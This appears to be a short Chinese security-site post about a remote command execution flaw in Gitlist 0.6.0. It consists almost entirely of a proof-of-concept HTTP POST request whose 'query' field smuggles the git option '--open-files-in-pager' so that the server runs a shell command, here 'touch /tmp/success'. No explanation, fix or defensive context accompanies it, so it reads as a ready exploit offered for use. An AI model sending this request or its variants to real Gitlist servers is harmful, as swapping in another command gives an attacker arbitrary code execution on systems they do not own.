# Gitlist 0.6.0 遠程命令執行漏洞
==POC==
POST /example/tree/a/search HTTP/1.1 Host: www.0-sec.org:8080 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Content-Length: 56 query=--open-files-in-pager=touch /tmp/success;
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容